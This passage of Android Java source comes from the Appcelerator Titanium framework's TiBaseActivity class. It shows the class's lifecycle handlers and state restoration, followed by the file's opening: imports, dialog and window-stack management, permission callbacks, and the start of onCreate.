menuHelper.onOptionsItemSelected(item); } } @Override public boolean onPrepareOptionsMenu(Menu menu) { boolean listenerExists = false; synchronized (onPrepareOptionsMenuListeners.synchronizedList()) { for (OnPrepareOptionsMenuEvent listener : onPrepareOptionsMenuListeners.nonNull()) { try { listenerExists = true; TiLifecycle.fireOnPrepareOptionsMenuEvent(this, listener, menu); } catch (Throwable t) { Log.e(TAG, "Error dispatching OnPrepareOptionsMenuEvent: " + t.getMessage(), t); } } } return menuHelper.onPrepareOptionsMenu(super.onPrepareOptionsMenu(menu) || listenerExists, menu); } public static void callOrientationChangedListener(Activity activity, int width, int height, int rotation) { if (activity != null) { int currentOrientation = activity.getWindowManager().getDefaultDisplay().getRotation(); if (orientationChangedListener != null && previousOrientation != currentOrientation) { previousOrientation = currentOrientation; orientationChangedListener.onOrientationChanged (currentOrientation, width, height); } } } @Override public void onConfigurationChanged(Configuration newConfig) { super.onConfigurationChanged(newConfig); for (WeakReference<ConfigurationChangedListener> listener : configChangedListeners) { if (listener.get() != null) { listener.get().onConfigurationChanged(this, newConfig); } } } @Override protected void onNewIntent(Intent intent) { super.onNewIntent(intent); Log.d(TAG, "Activity " + this + " onNewIntent", Log.DEBUG_MODE); if (activityProxy != null) { IntentProxy ip = new IntentProxy(intent); KrollDict data = new KrollDict(); data.put(TiC.PROPERTY_INTENT, ip); activityProxy.fireSyncEvent(TiC.EVENT_NEW_INTENT, data); // TODO: Deprecate old event activityProxy.fireSyncEvent("newIntent", data); } } public void addOnLifecycleEventListener(OnLifecycleEvent listener) { lifecycleListeners.add(new WeakReference<OnLifecycleEvent>(listener)); } public void addOnInstanceStateEventListener(OnInstanceStateEvent listener) { instanceStateListeners.add(new WeakReference<OnInstanceStateEvent>(listener)); } public void addOnWindowFocusChangedEventListener(OnWindowFocusChangedEvent listener) { windowFocusChangedListeners.add(new WeakReference<OnWindowFocusChangedEvent>(listener)); } public void addInterceptOnBackPressedEventListener(interceptOnBackPressedEvent listener) { interceptOnBackPressedListeners.add(new WeakReference<interceptOnBackPressedEvent>(listener)); } public void addOnActivityResultListener(OnActivityResultEvent listener) { onActivityResultListeners.add(new WeakReference<OnActivityResultEvent>(listener)); } public void addOnCreateOptionsMenuEventListener(OnCreateOptionsMenuEvent listener) { onCreateOptionsMenuListeners.add(new WeakReference<OnCreateOptionsMenuEvent>(listener)); } public void addOnPrepareOptionsMenuEventListener(OnPrepareOptionsMenuEvent listener) { onPrepareOptionsMenuListeners.add(new WeakReference<OnPrepareOptionsMenuEvent>(listener)); } public void removeOnLifecycleEventListener(OnLifecycleEvent listener) { // TODO stub } private void dispatchCallback(String name, KrollDict data) { if (data == null) { data = new KrollDict(); } data.put("source", activityProxy); // TIMOB-19903 if (TiApplication.getInstance().runOnMainThread()) { // We must call this synchornously to ensure it happens before we release the Activity reference on the V8/Native side! activityProxy.callPropertySync(name, new Object[] { data }); } else { // This hopefully finishes before we release the reference on the native side?! I have seen it crash because it didn't before though... // Not sure it's safe to keep this behavior... activityProxy.callPropertyAsync(name, new Object[] { data }); } } private void releaseDialogs(boolean finish) { //clean up dialogs when activity is pausing or finishing for (Iterator<DialogWrapper> iter = dialogs.iterator(); iter.hasNext(); ) { DialogWrapper p = iter.next(); Dialog dialog = p.getDialog(); boolean persistent = p.getPersistent(); //if the activity is pausing but not finishing, clean up dialogs only if //they are non-persistent if (finish || !persistent) { if (dialog != null && dialog.isShowing()) { dialog.dismiss(); } dialogs.remove(p); } } } @Override public void onWindowFocusChanged(boolean hasFocus) { synchronized (windowFocusChangedListeners.synchronizedList()) { for (OnWindowFocusChangedEvent listener : windowFocusChangedListeners.nonNull()) { try { listener.onWindowFocusChanged(hasFocus); } catch (Throwable t) { Log.e(TAG, "Error dispatching onWindowFocusChanged event: " + t.getMessage(), t); } } } super.onWindowFocusChanged(hasFocus); } @Override /** * When this activity pauses, this method sets the current activity to null, fires a javascript 'pause' event, * and if the activity is finishing, remove all dialogs associated with it. */ protected void onPause() { inForeground = false; if (activityProxy != null) { dispatchCallback(TiC.PROPERTY_ON_PAUSE, null); } super.onPause(); isResumed = false; Log.d(TAG, "Activity " + this + " onPause", Log.DEBUG_MODE); TiApplication tiApp = getTiApp(); if (tiApp.isRestartPending()) { releaseDialogs(true); if (!isFinishing()) { finish(); } return; } if (!windowStack.empty()) { windowStack.peek().onWindowFocusChange(false); } TiApplication.updateActivityTransitionState(true); tiApp.setCurrentActivity(this, null); TiUIHelper.showSoftKeyboard(getWindow().getDecorView(), false); if (this.isFinishing()) { releaseDialogs(true); } else { //release non-persistent dialogs when activity hides releaseDialogs(false); } if (activityProxy != null) { activityProxy.fireEvent(TiC.EVENT_PAUSE, null); } synchronized (lifecycleListeners.synchronizedList()) { for (OnLifecycleEvent listener : lifecycleListeners.nonNull()) { try { TiLifecycle.fireLifecycleEvent(this, listener, TiLifecycle.LIFECYCLE_ON_PAUSE); } catch (Throwable t) { Log.e(TAG, "Error dispatching lifecycle event: " + t.getMessage(), t); } } } // Checkpoint for ti.background event if (tiApp != null && TiApplication.getInstance().isAnalyticsEnabled()) { analytics.sendAppBackgroundEvent(); } } @Override /** * When the activity resumes, this method updates the current activity to this and fires a javascript * 'resume' event. */ protected void onResume() { inForeground = true; if (activityProxy != null) { dispatchCallback(TiC.PROPERTY_ON_RESUME, null); } super.onResume(); if (isFinishing()) { return; } Log.d(TAG, "Activity " + this + " onResume", Log.DEBUG_MODE); TiApplication tiApp = getTiApp(); if (tiApp.isRestartPending()) { if (!isFinishing()) { finish(); } return; } if (!windowStack.empty()) { windowStack.peek().onWindowFocusChange(true); } tiApp.setCurrentActivity(this, this); TiApplication.updateActivityTransitionState(false); if (activityProxy != null) { activityProxy.fireEvent(TiC.EVENT_RESUME, null); } synchronized (lifecycleListeners.synchronizedList()) { for (OnLifecycleEvent listener : lifecycleListeners.nonNull()) { try { TiLifecycle.fireLifecycleEvent(this, listener, TiLifecycle.LIFECYCLE_ON_RESUME); } catch (Throwable t) { Log.e(TAG, "Error dispatching lifecycle event: " + t.getMessage(), t); } } } isResumed = true; // Checkpoint for ti.foreground event //String deployType = tiApp.getAppProperties().getString("ti.deploytype", "unknown"); if(TiApplication.getInstance().isAnalyticsEnabled()){ analytics.sendAppForegroundEvent(); } } @Override /** * When this activity starts, this method updates the current activity to this if necessary and * fire javascript 'start' and 'focus' events. Focus events will only fire if * the activity is not a tab activity. */ protected void onStart() { inForeground = true; if (activityProxy != null) { dispatchCallback(TiC.PROPERTY_ON_START, null); } super.onStart(); if (isFinishing()) { return; } // Newer versions of Android appear to turn this on by default. // Turn if off until an activity indicator is shown. setProgressBarIndeterminateVisibility(false); Log.d(TAG, "Activity " + this + " onStart", Log.DEBUG_MODE); TiApplication tiApp = getTiApp(); if (tiApp.isRestartPending()) { if (!isFinishing()) { finish(); } return; } updateTitle(); if (activityProxy != null) { // we only want to set the current activity for good in the resume state but we need it right now. // save off the existing current activity, set ourselves to be the new current activity temporarily // so we don't run into problems when we give the proxy the event Activity tempCurrentActivity = tiApp.getCurrentActivity(); tiApp.setCurrentActivity(this, this); activityProxy.fireEvent(TiC.EVENT_START, null); // set the current activity back to what it was originally tiApp.setCurrentActivity(this, tempCurrentActivity); } synchronized (lifecycleListeners.synchronizedList()) { for (OnLifecycleEvent listener : lifecycleListeners.nonNull()) { try { TiLifecycle.fireLifecycleEvent(this, listener, TiLifecycle.LIFECYCLE_ON_START); } catch (Throwable t) { Log.e(TAG, "Error dispatching lifecycle event: " + t.getMessage(), t); } } } // store current configuration orientation // This fixed bug with double orientation chnage firing when activity starts in landscape previousOrientation = getWindowManager().getDefaultDisplay().getRotation(); } @Override /** * When this activity stops, this method fires the javascript 'blur' and 'stop' events. Blur events will only fire * if the activity is not a tab activity. */ protected void onStop() { inForeground = false; if (activityProxy != null) { dispatchCallback(TiC.PROPERTY_ON_STOP, null); } super.onStop(); Log.d(TAG, "Activity " + this + " onStop", Log.DEBUG_MODE); if (getTiApp().isRestartPending()) { if (!isFinishing()) { finish(); } return; } if (activityProxy != null) { activityProxy.fireEvent(TiC.EVENT_STOP, null); } synchronized (lifecycleListeners.synchronizedList()) { for (OnLifecycleEvent listener : lifecycleListeners.nonNull()) { try { TiLifecycle.fireLifecycleEvent(this, listener, TiLifecycle.LIFECYCLE_ON_STOP); } catch (Throwable t) { Log.e(TAG, "Error dispatching lifecycle event: " + t.getMessage(), t); } } } KrollRuntime.suggestGC(); } @Override /** * When this activity restarts, this method updates the current activity to this and fires javascript 'restart' * event. */ protected void onRestart() { inForeground = true; if (activityProxy != null) { dispatchCallback(TiC.PROPERTY_ON_RESTART, null); } super.onRestart(); Log.d(TAG, "Activity " + this + " onRestart", Log.DEBUG_MODE); TiApplication tiApp = getTiApp(); if (tiApp.isRestartPending()) { if (!isFinishing()) { finish(); } return; } if (activityProxy != null) { // we only want to set the current activity for good in the resume state but we need it right now. // save off the existing current activity, set ourselves to be the new current activity temporarily // so we don't run into problems when we give the proxy the event Activity tempCurrentActivity = tiApp.getCurrentActivity(); tiApp.setCurrentActivity(this, this); activityProxy.fireEvent(TiC.EVENT_RESTART, null); // set the current activity back to what it was originally tiApp.setCurrentActivity(this, tempCurrentActivity); } } @Override /** * When the activity is about to go into the background as a result of user choice, this method fires the * javascript 'userleavehint' event. */ protected void onUserLeaveHint() { Log.d(TAG, "Activity " + this + " onUserLeaveHint", Log.DEBUG_MODE); if (getTiApp().isRestartPending()) { if (!isFinishing()) { finish(); } return; } if (activityProxy != null) { activityProxy.fireEvent(TiC.EVENT_USER_LEAVE_HINT, null); } super.onUserLeaveHint(); } @Override /** * When this activity is destroyed, this method removes it from the activity stack, performs * clean up, and fires javascript 'destroy' event. */ protected void onDestroy() { Log.d(TAG, "Activity " + this + " onDestroy", Log.DEBUG_MODE); if (activityProxy != null) { dispatchCallback(TiC.PROPERTY_ON_DESTROY, null); } inForeground = false; TiApplication tiApp = getTiApp(); //Clean up dialogs when activity is destroyed. releaseDialogs(true); if (tiApp.isRestartPending()) { super.onDestroy(); if (!isFinishing()) { finish(); } return; } synchronized (lifecycleListeners.synchronizedList()) { for (OnLifecycleEvent listener : lifecycleListeners.nonNull()) { try { TiLifecycle.fireLifecycleEvent(this, listener, TiLifecycle.LIFECYCLE_ON_DESTROY); } catch (Throwable t) { Log.e(TAG, "Error dispatching lifecycle event: " + t.getMessage(), t); } } } if (orientationListener != null) { orientationListener.disable(); orientationListener = null; } super.onDestroy(); boolean isFinishing = isFinishing(); // If the activity is finishing, remove the windowId and supportHelperId so the window and supportHelper can be released. // If the activity is forced to destroy by Android OS, keep the windowId and supportHelperId so the activity can be recovered. if (isFinishing) { int windowId = getIntentInt(TiC.INTENT_PROPERTY_WINDOW_ID, -1); TiActivityWindows.removeWindow(windowId); TiActivitySupportHelpers.removeSupportHelper(supportHelperId); } fireOnDestroy(); if (layout instanceof TiCompositeLayout) { Log.d(TAG, "Layout cleanup.", Log.DEBUG_MODE); ((TiCompositeLayout) layout).removeAllViews(); } layout = null; //LW windows if (window == null && view != null) { view.releaseViews(); view.release(); view = null; } if (window != null) { window.closeFromActivity(isFinishing); window.releaseViews(); window.removeAllChildren(); window.release(); window = null; } if (menuHelper != null) { menuHelper.destroy(); menuHelper = null; } if (activityProxy != null) { activityProxy.release(); activityProxy = null; } // Don't dispose the runtime if the activity is forced to destroy by Android, // so we can recover the activity later. KrollRuntime.decrementActivityRefCount(isFinishing); KrollRuntime.suggestGC(); } @Override protected void onSaveInstanceState(Bundle outState) { super.onSaveInstanceState(outState); // If the activity is forced to destroy by Android, save the supportHelperId so // we can get it back when the activity is recovered. if (!isFinishing() && supportHelper != null) { outState.putInt("supportHelperId", supportHelperId); } synchronized (instanceStateListeners.synchronizedList()) { for (OnInstanceStateEvent listener : instanceStateListeners.nonNull()) { try { TiLifecycle.fireInstanceStateEvent(outState, listener, TiLifecycle.ON_SAVE_INSTANCE_STATE); } catch (Throwable t) { Log.e(TAG, "Error dispatching OnInstanceStateEvent: " + t.getMessage(), t); } } } } @Override protected void onRestoreInstanceState(Bundle savedInstanceState) { super.onRestoreInstanceState(savedInstanceState); if (savedInstanceState.containsKey("supportHelperId")) { supportHelperId = savedInstanceState.getInt("supportHelperId"); supportHelper = TiActivitySupportHelpers.retrieveSupportHelper(this, supportHelperId); if (supportHelper == null) { Log.e(TAG, "Unable to retrieve the activity support helper."); } } synchronized (instanceStateListeners.synchronizedList()) { for (OnInstanceStateEvent listener : instanceStateListeners.nonNull()) { try { TiLifecycle.fireInstanceStateEvent(savedInstanceState, listener, TiLifecycle.ON_RESTORE_INSTANCE_STATE); } catch (Throwable t) { Log.e(TAG, "Error dispatching OnInstanceStateEvent: " + t.getMessage(), t); } } } } // called in order to ensure that the onDestroy call is only acted upon once. // should be called by any subclass protected void fireOnDestroy() { if (!onDestroyFired) { if (activityProxy != null) { activityProxy.fireEvent(TiC.EVENT_DESTROY, null); } onDestroyFired = true; } } protected boolean shouldFinishRootActivity() { return getIntentBoolean(TiC.INTENT_PROPERTY_FINISH_ROOT, false); } @Override public void finish() { super.finish(); if (shouldFinishRootActivity()) { TiApplication app = getTiApp(); if (app != null) { TiRootActivity rootActivity = app.getRootActivity(); if (rootActivity != null && !(rootActivity.equals(this)) && !rootActivity.isFinishing()) { rootActivity.finish(); } else if (rootActivity == null && !app.isRestartPending()) { // When the root activity has been killed and garbage collected and the app is not scheduled to restart, // we need to force finish the root activity while this activity has an intent to finish root. // This happens when the "Don't keep activities" option is enabled and the user stays in some activity // (eg. heavyweight window, tabgroup) other than the root activity for a while and then he wants to back // out the app. app.setForceFinishRootActivity(true); } } } } // These activityOnXxxx are all used by TiLaunchActivity when // the android bug 2373 is detected and the app is being re-started. // By calling these from inside its on onXxxx handlers, TiLaunchActivity // can avoid calling super.onXxxx (super being TiBaseActivity), which would // result in a bunch of Titanium-specific code running when we don't need it // since we are restarting the app as fast as possible. Calling these methods // allows TiLaunchActivity to fulfill the requirement that the Android built-in // Activity's onXxxx must be called. (Think of these as something like super.super.onXxxx // from inside TiLaunchActivity.) protected void activityOnPause() { super.onPause(); } protected void activityOnRestart() { super.onRestart(); } protected void activityOnResume() { super.onResume(); } protected void activityOnStop() { super.onStop(); } protected void activityOnStart() { super.onStart(); } protected void activityOnDestroy() { super.onDestroy(); } public void activityOnCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); } /** * Called by the onCreate methods of TiBaseActivity to determine if an unsupported application * re-launch appears to be occurring. * @param activity The Activity getting the onCreate * @param savedInstanceState The argument passed to the onCreate. A non-null value is a "tell" * that the system is re-starting a killed application. */ public static boolean isUnsupportedReLaunch(Activity activity, Bundle savedInstanceState) { // We have to relaunch the app if // 1. all the activities have been killed and the runtime has been disposed or // 2. the app's hosting process has been killed. In this case, onDestroy or any other method // is not called. We can check the status of the root activity to detect this situation. if (savedInstanceState != null && !(activity instanceof TiLaunchActivity) && (KrollRuntime.isDisposed() || TiApplication.getInstance().rootActivityLatch.getCount() != 0)) { return true; } return false; } }
android/titanium/src/java/org/appcelerator/titanium/TiBaseActivity.java
/** * Appcelerator Titanium Mobile * Copyright (c) 2009-2014 by Appcelerator, Inc. All Rights Reserved. * Licensed under the terms of the Apache Public License * Please see the LICENSE included with this distribution for details. */ package org.appcelerator.titanium; import java.lang.ref.WeakReference; import java.util.ArrayList; import java.util.Iterator; import java.util.List; import java.util.Stack; import java.util.concurrent.ConcurrentHashMap; import java.util.concurrent.CopyOnWriteArrayList; import org.appcelerator.kroll.KrollDict; import org.appcelerator.kroll.KrollFunction; import org.appcelerator.kroll.KrollObject; import org.appcelerator.kroll.KrollProxy; import org.appcelerator.kroll.KrollRuntime; import org.appcelerator.kroll.common.Log; import org.appcelerator.kroll.common.TiMessenger; import org.appcelerator.titanium.TiLifecycle.OnLifecycleEvent; import org.appcelerator.titanium.TiLifecycle.OnWindowFocusChangedEvent; import org.appcelerator.titanium.TiLifecycle.interceptOnBackPressedEvent; import org.appcelerator.titanium.TiLifecycle.OnActivityResultEvent; import org.appcelerator.titanium.TiLifecycle.OnInstanceStateEvent; import org.appcelerator.titanium.TiLifecycle.OnCreateOptionsMenuEvent; import org.appcelerator.titanium.TiLifecycle.OnPrepareOptionsMenuEvent; import org.appcelerator.titanium.proxy.ActionBarProxy; import org.appcelerator.titanium.proxy.ActivityProxy; import org.appcelerator.titanium.proxy.IntentProxy; import org.appcelerator.titanium.proxy.TiViewProxy; import org.appcelerator.titanium.proxy.TiWindowProxy; import org.appcelerator.titanium.util.TiActivityResultHandler; import org.appcelerator.titanium.util.TiActivitySupport; import org.appcelerator.titanium.util.TiActivitySupportHelper; import org.appcelerator.titanium.util.TiConvert; import org.appcelerator.titanium.util.TiMenuSupport; import org.appcelerator.titanium.util.TiPlatformHelper; import org.appcelerator.titanium.util.TiUIHelper; import org.appcelerator.titanium.util.TiWeakList; import org.appcelerator.titanium.view.TiCompositeLayout; import org.appcelerator.titanium.view.TiCompositeLayout.LayoutArrangement; import android.app.Activity; import android.support.v7.app.AppCompatActivity; import android.app.Dialog; import android.content.Intent; import android.content.IntentSender; import android.content.pm.ActivityInfo; import android.content.pm.PackageManager; import android.content.res.Configuration; import android.graphics.PixelFormat; import android.hardware.SensorManager; import android.os.Build; import android.os.Bundle; import android.os.Message; import android.os.Messenger; import android.os.RemoteException; import android.util.DisplayMetrics; import android.view.KeyEvent; import android.view.Menu; import android.view.MenuItem; import android.view.OrientationEventListener; import android.view.Surface; import android.view.View; import android.view.Window; import android.view.WindowManager; import android.view.ViewGroup.LayoutParams; import com.appcelerator.aps.APSAnalytics; /** * The base class for all non tab Titanium activities. To learn more about Activities, see the * <a href="http://developer.android.com/reference/android/app/Activity.html">Android Activity documentation</a>. */ public abstract class TiBaseActivity extends AppCompatActivity implements TiActivitySupport/*, ITiWindowHandler*/ { private static final String TAG = "TiBaseActivity"; private static OrientationChangedListener orientationChangedListener = null; private OrientationEventListener orientationListener; private boolean onDestroyFired = false; private int originalOrientationMode = -1; private boolean inForeground = false; // Indicates whether this activity is in foreground or not. private TiWeakList<OnLifecycleEvent> lifecycleListeners = new TiWeakList<OnLifecycleEvent>(); private TiWeakList<OnWindowFocusChangedEvent> windowFocusChangedListeners = new TiWeakList<OnWindowFocusChangedEvent>(); private TiWeakList<interceptOnBackPressedEvent> interceptOnBackPressedListeners = new TiWeakList<interceptOnBackPressedEvent>(); private TiWeakList<OnInstanceStateEvent> instanceStateListeners = new TiWeakList<OnInstanceStateEvent>(); private TiWeakList<OnActivityResultEvent> onActivityResultListeners = new TiWeakList<OnActivityResultEvent>(); private TiWeakList<OnCreateOptionsMenuEvent> onCreateOptionsMenuListeners = new TiWeakList<OnCreateOptionsMenuEvent>(); private TiWeakList<OnPrepareOptionsMenuEvent> onPrepareOptionsMenuListeners = new TiWeakList<OnPrepareOptionsMenuEvent>(); private APSAnalytics analytics = APSAnalytics.getInstance(); public static class PermissionContextData { private final Integer requestCode; private final KrollObject context; private final KrollFunction callback; public PermissionContextData(Integer requestCode, KrollFunction callback, KrollObject context) { this.requestCode = requestCode; this.callback = callback; this.context = context; } public Integer getRequestCode() { return requestCode; } public KrollFunction getCallback() { return callback; } public KrollObject getContext() { return context; } } private static ConcurrentHashMap<Integer,PermissionContextData> callbackDataByPermission = new ConcurrentHashMap<Integer, PermissionContextData>(); protected View layout; protected TiActivitySupportHelper supportHelper; protected int supportHelperId = -1; protected TiWindowProxy window; protected TiViewProxy view; protected ActivityProxy activityProxy; protected TiWeakList<ConfigurationChangedListener> configChangedListeners = new TiWeakList<ConfigurationChangedListener>(); protected int orientationDegrees; protected TiMenuSupport menuHelper; protected Messenger messenger; protected int msgActivityCreatedId = -1; protected int msgId = -1; protected static int previousOrientation = -1; //Storing the activity's dialogs and their persistence private CopyOnWriteArrayList<DialogWrapper> dialogs = new CopyOnWriteArrayList<DialogWrapper>(); private Stack<TiWindowProxy> windowStack = new Stack<TiWindowProxy>(); public TiWindowProxy lwWindow; public boolean isResumed = false; private boolean overridenLayout; public class DialogWrapper { boolean isPersistent; Dialog dialog; WeakReference<TiBaseActivity> dialogActivity; public DialogWrapper(Dialog d, boolean persistent, WeakReference<TiBaseActivity> activity) { isPersistent = persistent; dialog = d; dialogActivity = activity; } public TiBaseActivity getActivity() { if (dialogActivity == null) { return null; } else { return dialogActivity.get(); } } public void setActivity(WeakReference<TiBaseActivity> da) { dialogActivity = da; } public Dialog getDialog() { return dialog; } public void setDialog(Dialog d) { dialog = d; } public void release() { dialog = null; dialogActivity = null; } public boolean getPersistent() { return isPersistent; } public void setPersistent(boolean p) { isPersistent = p; } } public void addWindowToStack(TiWindowProxy proxy) { if (windowStack.contains(proxy)) { Log.e(TAG, "Window already exists in stack", Log.DEBUG_MODE); return; } boolean isEmpty = windowStack.empty(); if (!isEmpty) { windowStack.peek().onWindowFocusChange(false); } windowStack.add(proxy); if (!isEmpty) { proxy.onWindowFocusChange(true); } } public void removeWindowFromStack(TiWindowProxy proxy) { proxy.onWindowFocusChange(false); boolean isTopWindow = ( (!windowStack.isEmpty()) && (windowStack.peek() == proxy) ) ? true : false; windowStack.remove(proxy); //Fire focus only if activity is not paused and the removed window was topWindow if (!windowStack.empty() && isResumed && isTopWindow) { TiWindowProxy nextWindow = windowStack.peek(); nextWindow.onWindowFocusChange(true); } } /** * Returns the window at the top of the stack. * @return the top window or null if the stack is empty. */ public TiWindowProxy topWindowOnStack() { return (windowStack.isEmpty()) ? null : windowStack.peek(); } // could use a normal ConfigurationChangedListener but since only orientation changes are // forwarded, create a separate interface in order to limit scope and maintain clarity public static interface OrientationChangedListener { public void onOrientationChanged (int configOrientationMode, int width, int height); } public static void registerOrientationListener (OrientationChangedListener listener) { orientationChangedListener = listener; } public static void deregisterOrientationListener() { orientationChangedListener = null; } public static interface ConfigurationChangedListener { public void onConfigurationChanged(TiBaseActivity activity, Configuration newConfig); } /** * @return the instance of TiApplication. */ public TiApplication getTiApp() { return (TiApplication) getApplication(); } /** * @return the window proxy associated with this activity. */ public TiWindowProxy getWindowProxy() { return this.window; } /** * Sets the window proxy. * @param proxy */ public void setWindowProxy(TiWindowProxy proxy) { this.window = proxy; } /** * Sets the proxy for our layout (used for post layout event) * * @param proxy */ public void setLayoutProxy(TiViewProxy proxy) { if (layout instanceof TiCompositeLayout) { ((TiCompositeLayout) layout).setProxy(proxy); } } /** * Sets the view proxy. * @param proxy */ public void setViewProxy(TiViewProxy proxy) { this.view = proxy; } /** * @return activity proxy associated with this activity. */ public ActivityProxy getActivityProxy() { return activityProxy; } public void addDialog(DialogWrapper d) { if (!dialogs.contains(d)) { dialogs.add(d); } } public void removeDialog(Dialog d) { for (int i = 0; i < dialogs.size(); i++) { DialogWrapper p = dialogs.get(i); if (p.getDialog().equals(d)) { p.release(); dialogs.remove(i); return; } } } public void setActivityProxy(ActivityProxy proxy) { this.activityProxy = proxy; } /** * @return the activity's current layout. */ public View getLayout() { return layout; } public void setLayout(View layout) { this.layout = layout; } public void addConfigurationChangedListener(ConfigurationChangedListener listener) { configChangedListeners.add(new WeakReference<ConfigurationChangedListener>(listener)); } public void removeConfigurationChangedListener(ConfigurationChangedListener listener) { configChangedListeners.remove(listener); } public void registerOrientationChangedListener (OrientationChangedListener listener) { orientationChangedListener = listener; } public void deregisterOrientationChangedListener() { orientationChangedListener = null; } protected boolean getIntentBoolean(String property, boolean defaultValue) { Intent intent = getIntent(); if (intent != null) { if (intent.hasExtra(property)) { return intent.getBooleanExtra(property, defaultValue); } } return defaultValue; } protected int getIntentInt(String property, int defaultValue) { Intent intent = getIntent(); if (intent != null) { if (intent.hasExtra(property)) { return intent.getIntExtra(property, defaultValue); } } return defaultValue; } protected String getIntentString(String property, String defaultValue) { Intent intent = getIntent(); if (intent != null) { if (intent.hasExtra(property)) { return intent.getStringExtra(property); } } return defaultValue; } protected void updateTitle() { if (window == null) return; if (window.hasProperty(TiC.PROPERTY_TITLE)) { String oldTitle = (String) getTitle(); String newTitle = TiConvert.toString(window.getProperty(TiC.PROPERTY_TITLE)); if (oldTitle == null) { oldTitle = ""; } if (newTitle == null) { newTitle = ""; } if (!newTitle.equals(oldTitle)) { final String fnewTitle = newTitle; runOnUiThread(new Runnable(){ public void run() { setTitle(fnewTitle); } }); } } } // Subclasses can override to provide a custom layout protected View createLayout() { LayoutArrangement arrangement = LayoutArrangement.DEFAULT; String layoutFromIntent = getIntentString(TiC.INTENT_PROPERTY_LAYOUT, ""); if (layoutFromIntent.equals(TiC.LAYOUT_HORIZONTAL)) { arrangement = LayoutArrangement.HORIZONTAL; } else if (layoutFromIntent.equals(TiC.LAYOUT_VERTICAL)) { arrangement = LayoutArrangement.VERTICAL; } // set to null for now, this will get set correctly in setWindowProxy() return new TiCompositeLayout(this, arrangement, null); } @Override public void onRequestPermissionsResult(int requestCode, String permissions[], int[] grantResults) { if (!callbackDataByPermission.isEmpty()) { handlePermissionRequestResult(requestCode, permissions, grantResults); } } private void handlePermissionRequestResult(Integer requestCode, String[] permissions, int[] grantResults) { PermissionContextData cbd = callbackDataByPermission.get(requestCode); if (cbd == null) { return; } String deniedPermissions = ""; for (int i = 0; i < grantResults.length; ++i) { if (grantResults[i] == PackageManager.PERMISSION_DENIED) { if (deniedPermissions.isEmpty()) { deniedPermissions = permissions[i]; } else { deniedPermissions = deniedPermissions + ", " + permissions[i]; } } } KrollDict response = new KrollDict(); if (deniedPermissions.isEmpty()) { response.putCodeAndMessage(0, null); } else { response.putCodeAndMessage(-1, "Permission(s) denied: " + deniedPermissions); } KrollFunction callback = cbd.getCallback(); if (callback != null) { KrollObject context = cbd.getContext(); if (context == null) { Log.w(TAG, "Permission callback context object is null"); } callback.callAsync(context, response); } else { Log.w(TAG, "Permission callback function has not been set"); } } /** * register permission request result callback for activity * * @param requestCode request code (8 Bit) to associate callback with request * @param callback callback function which receives a KrollDict with success, * code, optional message and requestCode * @param context KrollObject as required by async callback pattern */ public static void registerPermissionRequestCallback(Integer requestCode, KrollFunction callback, KrollObject context) { if (callback != null && context != null) { callbackDataByPermission.put(requestCode, new PermissionContextData(requestCode, callback, context)); } } protected void setFullscreen(boolean fullscreen) { if (fullscreen) { //getWindow().addFlags(WindowManager.LayoutParams.FLAG_FULLSCREEN); View decorView = getWindow().getDecorView(); // Hide both the navigation bar and the status bar. // SYSTEM_UI_FLAG_FULLSCREEN is only available on Android 4.1 and higher, but as // a general rule, you should design your app to hide the status bar whenever you // hide the navigation bar. int uiOptions = View.SYSTEM_UI_FLAG_HIDE_NAVIGATION | View.SYSTEM_UI_FLAG_FULLSCREEN; decorView.setSystemUiVisibility(uiOptions); } } // Subclasses can override to handle post-creation (but pre-message fire) logic @SuppressWarnings("deprecation") protected void windowCreated(Bundle savedInstanceState) { boolean fullscreen = getIntentBoolean(TiC.PROPERTY_FULLSCREEN, false); boolean modal = getIntentBoolean(TiC.PROPERTY_MODAL, false); int softInputMode = getIntentInt(TiC.PROPERTY_WINDOW_SOFT_INPUT_MODE, -1); int windowFlags = getIntentInt(TiC.PROPERTY_WINDOW_FLAGS, 0); boolean hasSoftInputMode = softInputMode != -1; setFullscreen(fullscreen); if (windowFlags > 0) { getWindow().addFlags(windowFlags); } if (modal) { if (Build.VERSION.SDK_INT < TiC.API_LEVEL_ICE_CREAM_SANDWICH) { // This flag is deprecated in API 14. On ICS, the background is not blurred but straight black. getWindow().addFlags(WindowManager.LayoutParams.FLAG_BLUR_BEHIND); } } if (hasSoftInputMode) { Log.d(TAG, "windowSoftInputMode: " + softInputMode, Log.DEBUG_MODE); getWindow().setSoftInputMode(softInputMode); } boolean useActivityWindow = getIntentBoolean(TiC.INTENT_PROPERTY_USE_ACTIVITY_WINDOW, false); if (useActivityWindow) { int windowId = getIntentInt(TiC.INTENT_PROPERTY_WINDOW_ID, -1); TiActivityWindows.windowCreated(this, windowId, savedInstanceState); } } // Record if user has set a content view manually from hyperloop code during require of app.js! @Override public void setContentView(View view) { overridenLayout = true; super.setContentView(view); } @Override public void setContentView(int layoutResID) { overridenLayout = true; super.setContentView(layoutResID); } @Override public void setContentView(View view, LayoutParams params) { overridenLayout = true; super.setContentView(view, params); } @Override /** * When the activity is created, this method adds it to the activity stack and * fires a javascript 'create' event. * @param savedInstanceState Bundle of saved data. */ protected void onCreate(Bundle savedInstanceState) { Log.d(TAG, "Activity " + this + " onCreate", Log.DEBUG_MODE); inForeground = true; TiApplication tiApp = getTiApp(); if (tiApp.isRestartPending()) { super.onCreate(savedInstanceState); if (!isFinishing()) { finish(); } return; } // If all the activities has been killed and the runtime has been disposed or the app's hosting process has // been killed, we cannot recover one specific activity because the info of the top-most view proxy has been // lost (TiActivityWindows.dispose()). In this case, we have to restart the app. if (TiBaseActivity.isUnsupportedReLaunch(this, savedInstanceState)) { Log.w(TAG, "Runtime has been disposed or app has been killed. Finishing."); super.onCreate(savedInstanceState); tiApp.scheduleRestart(250); finish(); return; } TiApplication.addToActivityStack(this); // create the activity proxy here so that it is accessible from the activity in all cases activityProxy = new ActivityProxy(this); // Increment the reference count so we correctly clean up when all of our activities have been destroyed KrollRuntime.incrementActivityRefCount(); Intent intent = getIntent(); if (intent != null) { if (intent.hasExtra(TiC.INTENT_PROPERTY_MESSENGER)) { messenger = (Messenger) intent.getParcelableExtra(TiC.INTENT_PROPERTY_MESSENGER); msgActivityCreatedId = intent.getIntExtra(TiC.INTENT_PROPERTY_MSG_ACTIVITY_CREATED_ID, -1); msgId = intent.getIntExtra(TiC.INTENT_PROPERTY_MSG_ID, -1); } if (intent.hasExtra(TiC.PROPERTY_WINDOW_PIXEL_FORMAT)) { getWindow().setFormat(intent.getIntExtra(TiC.PROPERTY_WINDOW_PIXEL_FORMAT, PixelFormat.UNKNOWN)); } } // Doing this on every 